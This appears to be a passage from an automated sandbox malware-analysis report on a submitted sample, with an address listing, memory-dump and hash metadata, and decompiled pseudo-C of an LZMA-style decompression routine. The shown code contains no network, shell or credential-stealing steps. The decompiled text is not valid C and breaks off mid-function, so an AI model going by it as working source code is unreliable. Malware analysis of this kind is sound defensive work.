                                                0x004073af
                                                0x004073b3
                                                0x004073b5
                                                0x004073b5
                                                0x004073b6
                                                0x004073b9
                                                0x0040738f
                                                0x0040738f
                                                0x00407397
                                                0x0040739c
                                                0x0040739e
                                                0x004073a1
                                                0x004073a1
                                                0x004073bc
                                                0x004073c3
                                                0x00000000
                                                0x004073c5
                                                0x00000000
                                                0x004073c5
                                                0x00000000
                                                0x00407061
                                                0x00407064
                                                0x0040709a
                                                0x004071ca
                                                0x004071ca
                                                0x004071ca
                                                0x004071ca
                                                0x004071cd
                                                0x004071cd
                                                0x004071d0
                                                0x004071d2
                                                0x0040745c
                                                0x00000000
                                                0x0040745c
                                                0x004071d8
                                                0x004071db
                                                0x00000000
                                                0x00000000
                                                0x004071e1
                                                0x004071e5
                                                0x004071e8
                                                0x004071e8
                                                0x004071e8
                                                0x00000000
                                                0x004071e8
                                                0x00407066
                                                0x00407068
                                                0x0040706a
                                                0x0040706c
                                                0x0040706f
                                                0x00407070
                                                0x00407072
                                                0x00407074
                                                0x00407077
                                                0x0040707a
                                                0x00407090
                                                0x00407095
                                                0x004070cd
                                                0x004070cd
                                                0x004070d1
                                                0x004070fd
                                                0x004070ff
                                                0x00407106
                                                0x00407109
                                                0x0040710c
                                                0x0040710c
                                                0x00407111
                                                0x00407111
                                                0x00407113
                                                0x00407116
                                                0x0040711d
                                                0x00407120
                                                0x0040714d
                                                0x0040714d
                                                0x00407150
                                                0x00407153
                                                0x004071c7
                                                0x004071c7
                                                0x004071c7
                                                0x00000000
                                                0x004071c7
                                                0x00407155
                                                0x0040715b
                                                0x0040715e
                                                0x00407161
                                                0x00407164
                                                0x00407167
                                                0x0040716a
                                                0x0040716d
                                                0x00407170
                                                0x00407173
                                                0x00407176
                                                0x0040718f
                                                0x00407191
                                                0x00407194
                                                0x00407195
                                                0x00407198
                                                0x0040719a
                                                0x0040719d
                                                0x0040719f
                                                0x004071a1
                                                0x004071a4
                                                0x004071a6
                                                0x004071a9
                                                0x004071ad
                                                0x004071af
                                                0x004071af
                                                0x004071b0
                                                0x004071b3
                                                0x004071b6
                                                0x00407178
                                                0x00407178
                                                0x00407180
                                                0x00407185
                                                0x00407187
                                                0x0040718a
                                                0x0040718a
                                                0x004071b9
                                                0x004071c0
                                                0x0040714a
                                                0x0040714a
                                                0x0040714a
                                                0x0040714a
                                                0x00000000
                                                0x004071c2
                                                0x00000000
                                                0x004071c2
                                                0x004071c0
                                                0x004070d3
                                                0x004070d6
                                                0x004070d8
                                                0x004070db
                                                0x004070de
                                                0x004070e1
                                                0x004070e3
                                                0x004070e6
                                                0x004070e9
                                                0x004070e9
                                                0x004070ec
                                                0x004070ec
                                                0x004070ef
                                                0x004070f6
                                                0x004070ca
                                                0x004070ca
                                                0x004070ca
                                                0x004070ca
                                                0x00000000
                                                0x004070f8
                                                0x00000000
                                                0x004070f8
                                                0x004070f6
                                                0x0040707c
                                                0x0040707f
                                                0x00407081
                                                0x00407084
                                                0x00000000
                                                0x00000000
                                                0x00406de3
                                                0x00406de3
                                                0x00406de7
                                                0x0040742c
                                                0x00000000
                                                0x0040742c
                                                0x00406ded
                                                0x00406df0
                                                0x00406df3
                                                0x00406df6
                                                0x00406df9
                                                0x00406dfc
                                                0x00406dff
                                                0x00406e01
                                                0x00406e04
                                                0x00406e07
                                                0x00406e0a
                                                0x00406e0c
                                                0x00406e0c
                                                0x00406e0c
                                                0x00000000
                                                0x00000000
                                                0x00406f6e
                                                0x00406f6e
                                                0x00406f72
                                                0x00407438
                                                0x00000000
                                                0x00407438
                                                0x00406f78
                                                0x00406f7b
                                                0x00406f7e
                                                0x00406f81
                                                0x00406f83
                                                0x00406f83
                                                0x00406f83
                                                0x00406f86
                                                0x00406f89
                                                0x00406f8c
                                                0x00406f8f
                                                0x00406f92
                                                0x00406f95
                                                0x00406f96
                                                0x00406f98
                                                0x00406f98
                                                0x00406f98
                                                0x00406f9b
                                                0x00406f9e
                                                0x00406fa1
                                                0x00406fa4
                                                0x00406fa4
                                                0x00406fa4
                                                0x00406fa7
                                                0x00406fa9
                                                0x00406fa9
                                                0x00000000
                                                0x00000000
                                                0x004071eb
                                                0x004071eb
                                                0x004071eb
                                                0x004071ef
                                                0x00000000
                                                0x00000000
                                                0x004071f5
                                                0x004071f8
                                                0x004071fb
                                                0x004071fe
                                                0x00407200
                                                0x00407200
                                                0x00407200
                                                0x00407203
                                                0x00407206
                                                0x00407209
                                                0x0040720c
                                                0x0040720f
                                                0x00407212
                                                0x00407213
                                                0x00407215
                                                0x00407215
                                                0x00407215
                                                0x00407218
                                                0x0040721b
                                                0x0040721e
                                                0x00407221
                                                0x00407224
                                                0x00407228
                                                0x0040722a
                                                0x0040722d
                                                0x00000000
                                                0x0040722f
                                                0x00406fac
                                                0x00406fac
                                                0x00000000
                                                0x00406fac
                                                0x0040722d
                                                0x00407462
                                                0x00000000
                                                0x00000000
                                                0x00406a91
                                                0x00407499
                                                0x00407499
                                                0x00000000
                                                0x00407499
                                                0x004072e6
                                                0x0040726d
                                                0x0040726a
                                                0x00000000
                                                0x00406fbf

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
                                                • Instruction ID: e79abdf9917e1b0942e39fca47e1ede282e873968176da0823b4a4e8bca0445d
                                                • Opcode Fuzzy Hash: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
                                                • Instruction Fuzzy Hash: 0A712371E04229CBDB28CF98C884BADBBB1FB44305F14816EE856B7291C7786986DF45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 98%
                                                			E00406F07() {
                                                				unsigned short _t531;
                                                				signed int _t532;
                                                				void _t533;
                                                				signed int _t534;
                                                				signed int _t535;
                                                				signed int _t565;
                                                				signed int _t568;
                                                				signed int _t589;
                                                				signed int* _t606;
                                                				void* _t613;
                                                
                                                				L0:
                                                				while(1) {
                                                					L0:
                                                					if( *(_t613 - 0x40) != 0) {
                                                						 *(_t613 - 0x84) = 0xa;
                                                						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                                                					} else {
                                                						 *(__ebp - 0x84) = 9;
                                                						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                					}
                                                					while(1) {
                                                						 *(_t613 - 0x54) = _t606;
                                                						while(1) {
                                                							L133:
                                                							_t531 =  *_t606;
                                                							_t589 = _t531 & 0x0000ffff;
                                                							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                							if( *(_t613 - 0xc) >= _t565) {
                                                								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                								 *(_t613 - 0x40) = 1;
                                                								_t532 = _t531 - (_t531 >> 5);
                                                								 *_t606 = _t532;
                                                							} else {
                                                								 *(_t613 - 0x10) = _t565;
                                                								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                							}
                                                							if( *(_t613 - 0x10) >= 0x1000000) {
                                                								goto L139;
                                                							}
                                                							L137:
                                                							if( *(_t613 - 0x6c) == 0) {
                                                								 *(_t613 - 0x88) = 5;
                                                								L170:
                                                								_t568 = 0x22;
                                                								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                								_t535 = 0;
                                                								L172:
                                                								return _t535;
                                                							}
                                                							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                							L139:
                                                							_t533 =  *(_t613 - 0x84);
                                                							while(1) {
                                                								 *(_t613 - 0x88) = _t533;
                                                								while(1) {
                                                									L1:
                                                									_t534 =  *(_t613 - 0x88);
                                                									if(_t534 > 0x1c) {
                                                										break;
                                                									}
                                                									switch( *((intOrPtr*)(_t534 * 4 +  &M004074A1))) {
                                                										case 0:
                                                											if( *(_t613 - 0x6c) == 0) {
                                                												goto L170;
                                                											}
                                                											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                											_t534 =  *( *(_t613 - 0x70));
                                                											if(_t534 > 0xe1) {
                                                												goto L171;
                                                											}
                                                											_t538 = _t534 & 0x000000ff;
                                                											_push(0x2d);
                                                											asm("cdq");
                                                											_pop(_t570);
                                                											_push(9);
                                                											_pop(_t571);
                                                											_t609 = _t538 / _t570;
                                                											_t540 = _t538 % _t570 & 0x000000ff;
                                                											asm("cdq");
                                                											_t604 = _t540 % _t571 & 0x000000ff;
                                                											 *(_t613 - 0x3c) = _t604;
                                                											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                											_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                												L10:
                                                												if(_t612 == 0) {
                                                													L12:
                                                													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                													goto L15;
                                                												} else {
                                                													goto L11;
                                                												}
                                                												do {
                                                													L11:
                                                													_t612 = _t612 - 1;
                                                													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                												} while (_t612 != 0);
                                                												goto L12;
                                                											}
                                                											if( *(_t613 - 4) != 0) {
                                                												GlobalFree( *(_t613 - 4)); // executed
                                                											}
                                                											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                											 *(_t613 - 4) = _t534;
                                                											if(_t534 == 0) {
                                                												goto L171;
                                                											} else {
                                                												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                												goto L10;
                                                											}
                                                										case 1:
                                                											L13:
                                                											__eflags =  *(_t613 - 0x6c);
                                                											if( *(_t613 - 0x6c) == 0) {
                                                												 *(_t613 - 0x88) = 1;
                                                												goto L170;
                                                											}
                                                											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                											_t45 = _t613 - 0x48;
                                                											 *_t45 =  *(_t613 - 0x48) + 1;
                                                											__eflags =  *_t45;
                                                											L15:
                                                											if( *(_t613 - 0x48) < 4) {
                                                												goto L13;
                                                											}
                                                											_t546 =  *(_t613 - 0x40);
                                                											if(_t546 ==  *(_t613 - 0x74)) {
                                                												L20:
                                                												 *(_t613 - 0x48) = 5;
                                                												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                												goto L23;
                                                											}
                                                											 *(_t613 - 0x74) = _t546;
                                                											if( *(_t613 - 8) != 0) {
                                                												GlobalFree( *(_t613 - 8)); // executed
                                                											}
                                                											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                											 *(_t613 - 8) = _t534;
                                                											if(_t534 == 0) {
                                                												goto L171;
                                                											} else {
                                                												goto L20;
                                                											}
                                                										case 2:
                                                											L24:
                                                											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                											 *(_t613 - 0x84) = 6;
                                                											 *(_t613 - 0x4c) = _t553;
                                                											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                											 *(_t613 - 0x54) = _t606;
                                                											goto L133;
                                                										case 3:
                                                											L21:
                                                											__eflags =  *(_t613 - 0x6c);
                                                											if( *(_t613 - 0x6c) == 0) {
                                                												 *(_t613 - 0x88) = 3;
                                                												goto L170;
                                                											}
                                                											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                											_t67 = _t613 - 0x70;
                                                											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                											__eflags =  *_t67;
                                                											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                											L23:
                                                											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                											if( *(_t613 - 0x48) != 0) {
                                                												goto L21;
                                                											}
                                                											goto L24;
                                                										case 4:
                                                											L133:
                                                											_t531 =  *_t606;
                                                											_t589 = _t531 & 0x0000ffff;
                                                											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                											if( *(_t613 - 0xc) >= _t565) {
                                                												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                												 *(_t613 - 0x40) = 1;
                                                												_t532 = _t531 - (_t531 >> 5);
                                                												 *_t606 = _t532;
                                                											} else {
                                                												 *(_t613 - 0x10) = _t565;
                                                												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                											}
                                                											if( *(_t613 - 0x10) >= 0x1000000) {
                                                												goto L139;
                                                											}
                                                										case 5:
                                                											goto L137;
                                                										case 6:
                                                											__edx = 0;
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												__eax =  *(__ebp - 4);
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x34) = 1;
                                                												 *(__ebp - 0x84) = 7;
                                                												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                												while(1) {
                                                													 *(_t613 - 0x54) = _t606;
                                                													goto L133;
                                                												}
                                                											}
                                                											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                											__esi =  *(__ebp - 0x60);
                                                											__cl = 8;
                                                											__cl = 8 -  *(__ebp - 0x3c);
                                                											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                											__ecx =  *(__ebp - 0x3c);
                                                											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                											__ecx =  *(__ebp - 4);
                                                											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                											__eflags =  *(__ebp - 0x38) - 4;
                                                											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                											if( *(__ebp - 0x38) >= 4) {
                                                												__eflags =  *(__ebp - 0x38) - 0xa;
                                                												if( *(__ebp - 0x38) >= 0xa) {
                                                													_t98 = __ebp - 0x38;
                                                													 *_t98 =  *(__ebp - 0x38) - 6;
                                                													__eflags =  *_t98;
                                                												} else {
                                                													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                												}
                                                											} else {
                                                												 *(__ebp - 0x38) = 0;
                                                											}
                                                											__eflags =  *(__ebp - 0x34) - __edx;
                                                											if( *(__ebp - 0x34) == __edx) {
                                                												__ebx = 0;
                                                												__ebx = 1;
                                                												goto L61;
                                                											} else {
                                                												__eax =  *(__ebp - 0x14);
                                                												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                												__eflags = __eax -  *(__ebp - 0x74);
                                                												if(__eax >=  *(__ebp - 0x74)) {
                                                													__eax = __eax +  *(__ebp - 0x74);
                                                													__eflags = __eax;
                                                												}
                                                												__ecx =  *(__ebp - 8);
                                                												__ebx = 0;
                                                												__ebx = 1;
                                                												__al =  *((intOrPtr*)(__eax + __ecx));
                                                												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                												goto L41;
                                                											}
                                                										case 7:
                                                											__eflags =  *(__ebp - 0x40) - 1;
                                                											if( *(__ebp - 0x40) != 1) {
                                                												__eax =  *(__ebp - 0x24);
                                                												 *(__ebp - 0x80) = 0x16;
                                                												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                												__eax =  *(__ebp - 0x28);
                                                												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                												__eax =  *(__ebp - 0x2c);
                                                												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                												__eax = 0;
                                                												__eflags =  *(__ebp - 0x38) - 7;
                                                												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                												__al = __al & 0x000000fd;
                                                												__eax = (__eflags >= 0) - 1 + 0xa;
                                                												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                												__eax =  *(__ebp - 4);
                                                												__eax =  *(__ebp - 4) + 0x664;
                                                												__eflags = __eax;
                                                												 *(__ebp - 0x58) = __eax;
                                                												goto L69;
                                                											}
                                                											__eax =  *(__ebp - 4);
                                                											__ecx =  *(__ebp - 0x38);
                                                											 *(__ebp - 0x84) = 8;
                                                											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                											while(1) {
                                                												 *(_t613 - 0x54) = _t606;
                                                												goto L133;
                                                											}
                                                										case 8:
                                                											goto L0;
                                                										case 9:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												goto L89;
                                                											}
                                                											__eflags =  *(__ebp - 0x60);
                                                											if( *(__ebp - 0x60) == 0) {
                                                												goto L171;
                                                											}
                                                											__eax = 0;
                                                											__eflags =  *(__ebp - 0x38) - 7;
                                                											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                											__eflags = _t258;
                                                											0 | _t258 = _t258 + _t258 + 9;
                                                											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                											goto L75;
                                                										case 0xa:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												__eax =  *(__ebp - 4);
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x84) = 0xb;
                                                												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                												while(1) {
                                                													 *(_t613 - 0x54) = _t606;
                                                													goto L133;
                                                												}
                                                											}
                                                											__eax =  *(__ebp - 0x28);
                                                											goto L88;
                                                										case 0xb:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												__ecx =  *(__ebp - 0x24);
                                                												__eax =  *(__ebp - 0x20);
                                                												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                											} else {
                                                												__eax =  *(__ebp - 0x24);
                                                											}
                                                											__ecx =  *(__ebp - 0x28);
                                                											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                											L88:
                                                											__ecx =  *(__ebp - 0x2c);
                                                											 *(__ebp - 0x2c) = __eax;
                                                											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                											L89:
                                                											__eax =  *(__ebp - 4);
                                                											 *(__ebp - 0x80) = 0x15;
                                                											__eax =  *(__ebp - 4) + 0xa68;
                                                											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                											goto L69;
                                                										case 0xc:
                                                											L99:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												 *(__ebp - 0x88) = 0xc;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t334 = __ebp - 0x70;
                                                											 *_t334 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t334;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											__eax =  *(__ebp - 0x2c);
                                                											goto L101;
                                                										case 0xd:
                                                											L37:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												 *(__ebp - 0x88) = 0xd;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t122 = __ebp - 0x70;
                                                											 *_t122 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t122;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											L39:
                                                											__eax =  *(__ebp - 0x40);
                                                											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                												goto L48;
                                                											}
                                                											__eflags = __ebx - 0x100;
                                                											if(__ebx >= 0x100) {
                                                												goto L54;
                                                											}
                                                											L41:
                                                											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                											__ecx =  *(__ebp - 0x58);
                                                											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                											 *(__ebp - 0x48) = __eax;
                                                											__eax = __eax + 1;
                                                											__eax = __eax << 8;
                                                											__eax = __eax + __ebx;
                                                											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                											__ax =  *__esi;
                                                											 *(__ebp - 0x54) = __esi;
                                                											__edx = __ax & 0x0000ffff;
                                                											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                											__eflags =  *(__ebp - 0xc) - __ecx;
                                                											if( *(__ebp - 0xc) >= __ecx) {
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                												__cx = __ax;
                                                												 *(__ebp - 0x40) = 1;
                                                												__cx = __ax >> 5;
                                                												__eflags = __eax;
                                                												__ebx = __ebx + __ebx + 1;
                                                												 *__esi = __ax;
                                                											} else {
                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                												 *(__ebp - 0x10) = __ecx;
                                                												0x800 = 0x800 - __edx;
                                                												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                												__ebx = __ebx + __ebx;
                                                												 *__esi = __cx;
                                                											}
                                                											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                											 *(__ebp - 0x44) = __ebx;
                                                											if( *(__ebp - 0x10) >= 0x1000000) {
                                                												goto L39;
                                                											} else {
                                                												goto L37;
                                                											}
                                                										case 0xe:
                                                											L46:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												 *(__ebp - 0x88) = 0xe;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t156 = __ebp - 0x70;
                                                											 *_t156 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t156;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											while(1) {
                                                												L48:
                                                												__eflags = __ebx - 0x100;
                                                												if(__ebx >= 0x100) {
                                                													break;
                                                												}
                                                												__eax =  *(__ebp - 0x58);
                                                												__edx = __ebx + __ebx;
                                                												__ecx =  *(__ebp - 0x10);
                                                												__esi = __edx + __eax;
                                                												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                												__ax =  *__esi;
                                                												 *(__ebp - 0x54) = __esi;
                                                												__edi = __ax & 0x0000ffff;
                                                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                												__eflags =  *(__ebp - 0xc) - __ecx;
                                                												if( *(__ebp - 0xc) >= __ecx) {
                                                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                													__cx = __ax;
                                                													_t170 = __edx + 1; // 0x1
                                                													__ebx = _t170;
                                                													__cx = __ax >> 5;
                                                													__eflags = __eax;
                                                													 *__esi = __ax;
                                                												} else {
                                                													 *(__ebp - 0x10) = __ecx;
                                                													0x800 = 0x800 - __edi;
                                                													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                													__ebx = __ebx + __ebx;
                                                													 *__esi = __cx;
                                                												}
                                                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                												 *(__ebp - 0x44) = __ebx;
                                                												if( *(__ebp - 0x10) >= 0x1000000) {
                                                													continue;
                                                												} else {
                                                													goto L46;
                                                												}
                                                											}
                                                											L54:
                                                											_t173 = __ebp - 0x34;
                                                											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                											__eflags =  *_t173;
                                                											goto L55;
                                                										case 0xf:
                                                											L58:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												 *(__ebp - 0x88) = 0xf;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t203 = __ebp - 0x70;
                                                											 *_t203 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t203;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											L60:
                                                											__eflags = __ebx - 0x100;
                                                											if(__ebx >= 0x100) {
                                                												L55:
                                                												__al =  *(__ebp - 0x44);
                                                												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                												goto L56;
                                                											}
                                                											L61:
                                                											__eax =  *(__ebp - 0x58);
                                                											__edx = __ebx + __ebx;
                                                											__ecx =  *(__ebp - 0x10);
                                                											__esi = __edx + __eax;
